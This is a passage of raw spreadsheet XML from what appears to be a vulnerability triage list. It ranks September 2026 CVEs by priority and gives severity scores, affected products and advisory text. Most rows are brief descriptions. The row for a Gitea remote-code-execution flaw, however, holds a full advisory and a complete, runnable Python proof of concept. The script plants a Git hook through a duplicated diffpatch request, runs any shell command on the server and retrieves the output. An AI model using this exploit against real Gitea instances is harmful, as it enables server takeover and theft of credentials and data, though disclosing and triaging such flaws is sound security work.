t="inlineStr"><is><t>CVE-2026-81963</t></is></c><c r="D3" s="5" t="n"><v>7.8</v></c><c r="E3" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F3" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G3" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H3" s="5" t="n"><v>0.006</v></c><c r="I3" s="5" t="inlineStr" /><c r="J3" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L3" s="5" t="inlineStr" /><c r="M3" s="5" t="inlineStr" /><c r="N3" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O3" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P3" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q3" s="5" t="inlineStr"><is><t>2026-09-22</t></is></c><c r="R3" s="5" t="inlineStr"><is><t>CWE-284, CWE-59</t></is></c><c r="S3" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t></is></c></row><row r="4"><c r="A4" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B4" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C4" s="5" t="inlineStr"><is><t>CVE-2026-85880</t></is></c><c r="D4" s="5" t="n"><v>7.8</v></c><c r="E4" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F4" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G4" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H4" s="5" t="n"><v>0.006</v></c><c r="I4" s="5" t="inlineStr" /><c r="J4" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t></is></c><c r="L4" s="5" t="inlineStr" /><c r="M4" s="5" t="inlineStr" /><c r="N4" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O4" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P4" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q4" s="5" t="inlineStr"><is><t>2026-09-22</t></is></c><c r="R4" s="5" t="inlineStr"><is><t>CWE-122, CWE-908</t></is></c><c r="S4" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t></is></c></row><row r="5"><c r="A5" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B5" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C5" s="5" t="inlineStr"><is><t>CVE-2026-60004</t></is></c><c r="D5" s="5" t="inlineStr" /><c r="E5" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G5" s="5" t="inlineStr" /><c r="H5" s="5" t="n"><v>0.868</v></c><c r="I5" s="5" t="inlineStr" /><c r="J5" s="5" t="inlineStr" /><c r="K5" s="5" t="inlineStr" /><c r="L5" s="5" t="inlineStr"><is><t>Go:gitea.dev</t></is></c><c r="M5" s="5" t="inlineStr"><is><t>1.27.1</t></is></c><c r="N5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O5" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P5" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q5" s="5" t="inlineStr" /><c r="R5" s="5" t="inlineStr" /><c r="S5" s="5" t="inlineStr"><is><t>### Summary

Gitea's `diffpatch` endpoint can be abused to install and execute a Git hook from repository-controlled content.

An attacker with ordinary write access to a repository can execute arbitrary shell commands as the Gitea OS user. With default open registration, an unauthenticated visitor can obtain the required write access by registering an account and creating a repository.

### Details

`services/repository/files/patch.go` applies attacker-controlled patches in a shared bare temporary clone:

```go
cmdApply := gitcmd.NewCommand("apply", "--index", "--recount", "--cached", "--binary")
if git.DefaultFeatures().CheckVersionAtLeast("2.32") {
    cmdApply.AddArguments("-3")
}
````

Submitting the same patch twice creates an add/add collision. Git's three-way fallback checks the indexed path out even though the operation is performed with `--cached`.

In a bare clone, the repository root is `$GIT_DIR`. As a result, an executable entry named:

```text
hooks/post-index-change
```

becomes a live Git hook.

Git invokes the hook while writing the index, allowing repository-controlled content to execute arbitrary commands as the Gitea service account.

The hook's return value is not propagated to the `diffpatch` response.

The attached PoC stores command output in Git objects and creates a branch containing the result, so no outbound connection is required. The result is fetched through authenticated smart HTTP.

### PoC

The supplied `gitea_diffpatch_rce_poc.py` uses an existing Gitea account. Run it against a test instance where the account can create a repository.

Set the account password:

```bash
export GITEA_PASSWORD='account-password'
```

Execute a command through the `diffpatch` chain:

```bash
python3 ./gitea_diffpatch_rce_poc.py \
  https://gitea.example \
  pocuser \
  'id; uname -srm; pwd'
```

The script:

* Creates an initialized private repository.
* Submits the same executable-hook patch twice.
* Fetches the result branch.
* Prints the command's combined stdout, stderr, and exit status.
* Prints the evidence repository, ref, and commit IDs to stderr.

Expected output resembles:

```text
uid=1000(git) gid=1000(git) groups=1000(git)
Linux ...
/data/gitea/tmp/...

[exit-status=0]
```

The trigger requires:

* Git 2.32 or newer.
* An enabled `diffpatch` route.
* A writable and executable temporary filesystem.

Open registration is required only for the no-prior-credentials attack path.

### Impact

This is remote command execution as the Gitea service account (`CWE-94`).

Depending on deployment isolation and the privileges of the Gitea OS user, successful exploitation may expose:

* `app.ini` and Gitea application secrets.
* Process environment secrets.
* Mounted repositories.
* Database credentials and database contents.
* OAuth and integration credentials.
* Other internal or externally reachable services.

With open registration enabled, the attack can be performed by an unauthenticated visitor after registering a normal account and creating a repository.


&lt;img width="928" height="687" alt="Screenshot 2026-07-25 at 14 45 44" src="https://github.com/user-attachments/assets/e7ce9fe7-bcab-4539-82fc-14c3856bda1c" /&gt;




```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Gitea RCE PoC – authorized testing only.
"""

from __future__ import annotations

import argparse
import base64
import getpass
import hashlib
import json
import os
from pathlib import Path

import secrets
import shlex
import shutil
import subprocess
import sys
import tempfile

from typing import Any
import urllib.error
import urllib.parse
import urllib.request


TIMEOUT    = 30.0
USER_AGENT = "gitea-rce-poc/2.0"

_RST  = "\033[0m"
_DIM  = "\033[2m"
_GRN  = "\033[38;5;46m"     # bright green
_RED  = "\033[31m"           # red for errors

def _g(t: str) -&gt; str: return f"{_GRN}{t}{_RST}"
def _r(t: str) -&gt; str: return f"{_RED}{t}{_RST}"
def _d(t: str) -&gt; str: return f"{_DIM}{t}{_RST}"

def log_star(msg: str) -&gt; None: print(f"{_g('[*]')} {_d(msg)}")
def log_ok  (msg: str) -&gt; None: print(f"{_g('[+]')} {_g(msg)}")
def log_err (msg: str) -&gt; None: print(f"{_r('[-]')} {_r(msg)}")


_SEP = "  " + "═" * 44
BANNER = f"{_SEP}\n  GITEA  REMOTE CODE EXECUTION  POC\n{_SEP}"

def print_banner(url: str, version: str | None = None,
                 command: str | None = None) -&gt; None:
    print()
    for line in BANNER.splitlines():
        print(_g(line))
    print()
    ver = version or "unknown"
    print(_g("  " + "-" * 54))
    print(_g(f"  Target        : {url}"))
    print(_g(f"  Version       : {ver}"))
    if command:
        print(_g(f"  Command       : {command}"))
    print(_g("  " + "-" * 54))
    print()

class PocError(RuntimeError):
    pass

class GiteaClient:
    def __init__(self, base_url: str, username: str, password: str) -&gt; None:
        parsed = urllib.parse.urlsplit(base_url)
        if parsed.scheme not in {"http", "https"} or not parsed.netloc:
            raise PocError("URL must be an absolute http:// or https:// URL")
        if parsed.query or parsed.fragment:
            raise PocError("URL must not contain a query string or fragment")
        self.base_url = base_url.rstrip("/")
        self.username = username
        self.password = password
        encoded = base64.b64encode(
            f"{username}:{password}".encode()
        ).decode("ascii")
        self.authorization = f"Basic {encoded}"

    def api(
        self,
        method: str,
        path: str,
        payload: dict[str, Any] | None = None,
    ) -&gt; tuple[int, Any]:
        data = None
        if payload is not None:
            data = json.dumps(payload, separators=(",", ":")).encode()
        req = urllib.request.Request(
            self.base_url + path,
            data=data,
            method=method,
            headers={
                "Accept": "application/json",
                "Authorization": self.authorization,
                "Content-Type": "application/json",
                "User-Agent": USER_AGENT,
            },
        )
        try:
            with urllib.request.urlopen(req, timeout=TIMEOUT) as r:
                raw = r.read()
                return r.status, json.loads(raw) if raw else None
        except urllib.error.HTTPError as exc:
            body = exc.read().decode("utf-8", errors="replace")[:2_000]
            raise PocError(f"{method} {path} → HTTP {exc.code}: {body}") from exc
        except urllib.error.URLError as exc:
            raise PocError(f"{method} {path} failed: {exc.reason}") from exc
        except json.JSONDecodeError:
            raise PocError(f"{method} {path} returned invalid JSON")

def blob_oid(content: bytes) -&gt; str:
    return hashlib.sha1(
        f"blob {len(content)}\0".encode("ascii") + content
    ).hexdigest()

def build_hook(command: str, leak_ref: str) -&gt; bytes:
    qcmd = shlex.quote(command)
    qref = shlex.quote(f"refs/heads/{leak_ref}")
    return (
        "#!/bin/sh\n"
        'git_dir=$(git rev-parse --absolute-git-dir) || exit 1\n'
        'origin_objects=$(sed -n "1p" "$git_dir/objects/info/alternates") || exit 2\n'
        'case "$origin_objects" in\n'
        '  /*) ;;\n'
        '  *) origin_objects="$git_dir/objects/$origin_objects" ;;\n'
        "esac\n"
        'origin_git=${origin_objects%/objects}\n'
        '[ "$origin_git" != "$origin_objects" ] || exit 3\n'
        f"output_blob=$({{ /bin/sh -c {qcmd}; "
        'command_status=$?; printf "\\n[exit-status=%s]\\n" "$command_status"; } 2&gt;&amp;1 | '
        'git --git-dir="$origin_git" hash-object -w --stdin) || exit 4\n'
        'tree=$(printf "100644 blob %s\\toutput\\n" "$output_blob" | '
        'git --git-dir="$origin_git" mktree) || exit 5\n'
        'commit=$(printf "command output\\n" | '
        "GIT_AUTHOR_NAME=poc GIT_AUTHOR_EMAIL=poc@example.invalid "
        "GIT_COMMITTER_NAME=poc GIT_COMMITTER_EMAIL=poc@example.invalid "
        'git --git-dir="$origin_git" commit-tree "$tree") || exit 6\n'
        f'git --git-dir="$origin_git" update-ref {qref} "$commit" || exit 7\n'
        "exit 0\n"
    ).encode()

def build_patch(hook: bytes) -&gt; str:
    lc  = hook.count(b"\n")
    hdr = (
        "diff --git a/hooks/post-index-change b/hooks/post-index-change\n"
        "new file mode 100755\n"
        f"index {'0'*40}..{blob_oid(hook)}\n"
        "--- /dev/null\n"
        "+++ b/hooks/post-index-change\n"
        f"@@ -0,0 +1,{lc} @@\n"
    ).encode()
    return (hdr + b"".join(b"+" + l for l in hook.splitlines(keepends=True))).decode()

def run_git(git: str, arguments: list[str], env: dict[str, str]) -&gt; bytes:
    try:
        result = subprocess.run(
            [git, *arguments], env=env,
            stdin=subprocess.DEVNULL,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
            check=False, timeout=TIMEOUT,
        )
    except subprocess.TimeoutExpired as exc:
        raise PocError(f"git timed out after {TIMEOUT:g}s") from exc
    except OSError as exc:
        raise PocError(f"could not run git: {exc}") from exc
    if result.returncode != 0:
        err = result.stderr.decode("utf-8", errors="replace")[:2_000].strip()
        raise PocError(f"git exit {result.returncode}: {err}")
    return result.stdout

def fetch_output(git: str, client: GiteaClient,
                 owner: str, repo: str, leak_ref: str) -&gt; bytes:
    remote = (
        f"{client.base_url}/"
        f"{urllib.parse.quote(owner, safe='')}/"
        f"{urllib.parse.quote(repo, safe='')}.git"
    )
    with tempfile.TemporaryDirectory(prefix="gitea-poc-") as tmp:
        bare      = Path(tmp) / "fetch.git"
        auth_cfg  = Path(tmp) / "auth.config"
        fd = os.open(auth_cfg, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        with os.fdopen(fd, "w", encoding="utf-8") as f:
            f.write(f"[http]\n\textraHeader = Authorization: {client.authorization}\n")
        env = {**os.environ, "GIT_TERMINAL_PROMPT": "0"}
        run_git(git, ["init", "--bare", "--quiet", str(bare)], env)
        run_git(git, [
            "-C", str(bare), "-c", f"include.path={auth_cfg}",
            "fetch", "--quiet", "--no-tags",
            remote, f"refs/heads/{leak_ref}",
        ], env)
        return run_git(git, ["-C", str(bare), "show", "FETCH_HEAD:output"], env)

def split_output(raw: bytes) -&gt; tuple[str, int | None]:
    text  = raw.decode("utf-8", errors="replace")
    lines = text.splitlines()
    status: int | None = None
    if lines:
        t = lines[-1].strip()
        if t.startswith("[exit-status=") and t.endswith("]"):
            try:    status = int(t[len("[exit-status="):-1])
            except ValueError: pass
            else:   lines.pop()
    return "\n".join(lines).rstrip("\n"), status


def parse_args() -&gt; argparse.Namespace:
    p = argparse.ArgumentParser(description="Gitea RCE PoC")
    p.add_argument("url",      help="Gitea base URL")
    p.add_argument("username", help="existing Gitea username")
    p.add_argument("command",  help="shell command to execute on target")
    return p.parse_args()


def main() -&gt; int:
    args = parse_args()
    if "\0" in args.command:
        raise PocError("command must not contain a NUL character")

    password = os.environ.get("GITEA_PASSWORD") or getpass.getpass(
        _g("[?]") + " password: "
    )
    if not password:
        raise PocError("password must not be empty")

    git = shutil.which("git")
    if git is None:
        raise PocError("git executable not found in PATH")

    client = GiteaClient(args.url, args.username, password)

    # version probe (pre-banner)
    log_star("probing target...")
    version: str | None = None
    try:
        r = urllib.request.Request(
            client.base_url + "/api/v1/version",
            headers={"Accept": "application/json", "User-Agent": USER_AGENT},
        )
        with urllib.request.urlopen(r, timeout=TIMEOUT) as resp:
            version = json.loads(resp.read()).get("version", "unknown")
    except Exception:
        version = "unknown"
    print_banner(client.base_url, version, args.command)

    log_star(f"target={client.base_url}  user={args.username}  cmd={args.command}")
    print()

    # step 1 – authenticate
    log_star("authenticating...")
    sc, acct = client.api("GET", "/api/v1/user")
    if sc != 200 or not isinstance(acct, dict):
        log_err("authentication failed"); raise PocError("auth failed")
    owner = acct.get("login")
    if not isinstance(owner, str) or not owner:
        log_err("no login in response"); raise PocError("no login")
    log_ok(f"logged in as {owner}  ({version})")

    # step 2 – create repo
    unique   = secrets.token_hex(5)
    repo     = f"test-repo-{unique}"
    leak_ref = f"output-{unique}"
    log_star("creating repository...")
    sc, _ = client.api("POST", "/api/v1/user/repos", {
        "name": repo, "private": True,
        "auto_init": True, "default_branch": "main",
        "object_format_name": "sha1",
    })
    if sc != 201:
        log_err("repo creation failed"); raise PocError("repo creation failed")
    log_ok(f"created repo {owner}/{repo}")

    # steps 3–4 – deliver payloads
    body = {
        "content": build_patch(build_hook(args.command, leak_ref)),
        "message": "initial commit",
        "branch": "main", "new_branch": "main",
    }
    ep = (
        f"/api/v1/repos/{urllib.parse.quote(owner, safe='')}/"
        f"{urllib.parse.quote(repo, safe='')}/diffpatch"
    )
    commits: list[str] = []
    for cycle in (1, 2):
        log_star(f"delivering payload {cycle}/2...")
        sc, resp = client.api("POST", ep, body)
        try:
            commit = resp["commit"]["sha"]
        except (KeyError, TypeError) as exc:
            log_err(f"payload {cycle}/2 rejected")
            raise PocError(f"cycle {cycle} no commit") from exc
        if sc != 201:
            log_err(f"payload {cycle}/2 failed")
            raise PocError(f"cycle {cycle} failed")
        commits.append(commit)
        log_ok(f"payload {cycle}/2 accepted  commit={commit[:16]}")

    # step 5 – retrieve output
    log_star("retrieving output...")
    output = fetch_output(git, client, owner, repo, leak_ref)
    log_ok("operation complete")

    # command output
    cmd_out, exit_status = split_output(output)
    print()
    log_ok(f"{args.command}:")
    print(_g("---"))
    if cmd_out:
        for line in cmd_out.splitlines():
            print(_g(line))
    else:
        print(_d("&lt;no output&gt;"))
    print(_g("---"))
    if exit_status == 0:
        log_ok(f"exit status: {exit_status}")
    elif exit_status is None:
        log_star("exit status: unknown")
    else:
        log_err(f"exit status: {exit_status}")

    return 0


if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except PocError as exc:
        log_err(str(exc))
        raise SystemExit(1) from None

```</t></is></c><c r="T5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-60004</t></is></c></row><row r="6"><c r="A6" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B6" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C6" s="5" t="inlineStr"><is><t>CVE-2026-44756</t></is></c><c r="D6" s="5" t="n"><v>10</v></c><c r="E6" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F6" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G6" s="5" t="inlineStr" /><c r="H6" s="5" t="n"><v>0.003</v></c><c r="I6" s="5" t="inlineStr" /><c r="J6" s="5" t="inlineStr" /><c r="K6" s="5" t="inlineStr" /><c r="L6" s="5" t="inlineStr" /><c r="M6" s="5" t="inlineStr" /><c r="N6" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q6" s="5" t="inlineStr" /><c r="R6" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S6" s="5" t="inlineStr"><is><t>A memory safety vulnerability exists in the Extended Passport Protocol (EPP) processing library. Under specific conditions, an unauthenticated attacker could exploit a crafted network request containing a malformed EPP header, potentially resulting in undefined behavior and abnormal program termination. Successful exploitation may have a high impact on the confidentiality, integrity, and availability of the application.</t></is></c><c r="T6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-44756</t></is></c></row><row r="7"><c r="A7" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B7" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C7" s="5" t="inlineStr"><is><t>CVE-2026-82004</t></is></c><c r="D7" s="5" t="n"><v>10</v></c><c r="E7" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F7" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G7" s="5" t="inlineStr" /><c r="H7" s="5" t="n"><v>0.014</v></c><c r="I7" s="5" t="inlineStr" /><c r="J7" s="5" t="inlineStr" /><c r="K7" s="5" t="inlineStr"><is><t>adobe:campaign</t></is></c><c r="L7" s="5" t="inlineStr" /><c r="M7" s="5" t="inlineStr" /><c r="N7" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O7" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P7" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q7" s="5" t="inlineStr" /><c r="R7" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S7" s="5" t="inlineStr"><is><t>Adobe Campaign Classic (ACC) is affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t></is></c></row><row r="8"><c r="A8" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B8" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C8" s="5" t="inlineStr"><is><t>CVE-2026-12645</t></is></c><c r="D8" s="5" t="n"><v>9.9</v></c><c r="E8" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F8" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G8" s="5" t="inlineStr" /><c r="H8" s="5" t="n"><v>0.012</v></c><c r="I8" s="5" t="inlineStr" /><c r="J8" s="5" t="inlineStr" /><c r="K8" s="5" t="inlineStr" /><c r="L8" s="5" t="inlineStr" /><c r="M8" s="5" t="inlineStr" /><c r="N8" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O8" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P8" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q8" s="5" t="inlineStr" /><c r="R8" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S8" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12645</t></is></c></row><row r="9"><c r="A9" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B9" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C9" s="5" t="inlineStr"><is><t>CVE-2026-12646</t></is></c><c r="D9" s="5" t="n"><v>9.9</v></c><c r="E9" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F9" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G9" s="5" t="inlineStr" /><c r="H9" s="5" t="n"><v>0.012</v></c><c r="I9" s="5" t="inlineStr" /><c r="J9" s="5" t="inlineStr" /><c r="K9" s="5" t="inlineStr" /><c r="L9" s="5" t="inlineStr" /><c r="M9" s="5" t="inlineStr" /><c r="N9" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O9" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P9" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q9" s="5" t="inlineStr" /><c r="R9" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S9" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12646</t></is></c></row><row r="10"><c r="A10" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B10" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C10" s="5" t="inlineStr"><is><t>CVE-2026-12647</t></is></c><c r="D10" s="5" t="n"><v>9.9</v></c><c r="E10" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F10" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G10" s="5" t="inlineStr" /><c r="H10" s="5" t="n"><v>0.012</v></c><c r="I10" s="5" t="inlineStr" /><c r="J10" s="5" t="inlineStr" /><c r="K10" s="5" t="inlineStr" /><c r="L10" s="5" t="inlineStr" /><c r="M10" s="5" t="inlineStr" /><c r="N10" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O10" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P10" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q10" s="5" t="inlineStr" /><c r="R10" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S10" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T10" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12647</t></is></c></row><row r="11"><c r="A11" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B11" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C11" s="5" t="inlineStr"><is><t>CVE-2026-12650</t></is></c><c r="D11" s="5" t="n"><v>9.9</v></c><c r="E11" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F11" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G11" s="5" t="inlineStr" /><c r="H11" s="5" t="n"><v>0.015</v></c><c r="I11" s="5" t="inlineStr" /><c r="J11" s="5" t="inlineStr" /><c r="K11" s="5" t="inlineStr" /><c r="L11" s="5" t="inlineStr" /><c r="M11" s="5" t="inlineStr" /><c r="N11" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O11" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P11" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q11" s="5" t="inlineStr" /><c r="R11" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S11" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T11" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12650</t></is></c></row><row r="12"><c r="A12" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B12" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C12" s="5" t="inlineStr"><is><t>CVE-2026-19232</t></is></c><c r="D12" s="5" t="n"><v>9.9</v></c><c r="E12" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F12" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G12" s="5" t="inlineStr" /><c r="H12" s="5" t="n"><v>0.006</v></c><c r="I12" s="5" t="inlineStr" /><c r="J12" s="5" t="inlineStr" /><c r="K12" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L12" s="5" t="inlineStr" /><c r="M12" s="5" t="inlineStr" /><c r="N12" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O12" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P12" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q12" s="5" t="inlineStr" /><c r="R12" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S12" s="5" t="inlineStr"><is><t>Adobe Experience Manager is affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user, potentially gaining elevated access or control over the victim's account or session. A low-privileged attacker could exploit this vulnerability to gain elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T12" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t></is></c></row><row r="13"><c r="A13" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B13" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C13" s="5" t="inlineStr"><is><t>CVE-2026-26084</t></is></c><c r="D13" s="5" t="n"><v>9.9</v></c><c r="E13" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F13" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G13" s="5" t="inlineStr" /><c r="H13" s="5" t="n"><v>0.002</v></c><c r="I13" s="5" t="inlineStr" /><c r="J13" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K13" s="5" t="inlineStr" /><c r="L13" s="5" t="inlineStr" /><c r="M13" s="5" t="inlineStr" /><c r="N13" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q13" s="5" t="inlineStr" /><c r="R13" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S13" s="5" t="inlineStr"><is><t>A improper access control vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow attacker to access sensitive information via crafted HTTP requests.</t></is></c><c r="T13" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t></is></c></row><row r="14"><c r="A14" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B14" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C14" s="5" t="inlineStr"><is><t>CVE-2026-48273</t></is></c><c r="D14" s="5" t="n"><v>9.9</v></c><c r="E14" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F14" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G14" s="5" t="inlineStr" /><c r="H14" s="5" t="n"><v>0.019</v></c><c r="I14" s="5" t="inlineStr" /><c r="J14" s="5" t="inlineStr" /><c r="K14" s="5" t="inlineStr"><is><t>adobe:coldfusion</t></is></c><c r="L14" s="5" t="inlineStr" /><c r="M14" s="5" t="inlineStr" /><c r="N14" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O14" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P14" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q14" s="5" t="inlineStr" /><c r="R14" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S14" s="5" t="inlineStr"><is><t>ColdFusion is affected by an Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T14" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48273</t></is></c></row><row r="15"><c r="A15" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B15" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C15" s="5" t="inlineStr"><is><t>CVE-2026-78234</t></is></c><c r="D15" s="5" t="n"><v>9.9</v></c><c r="E15" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F15" s="5" 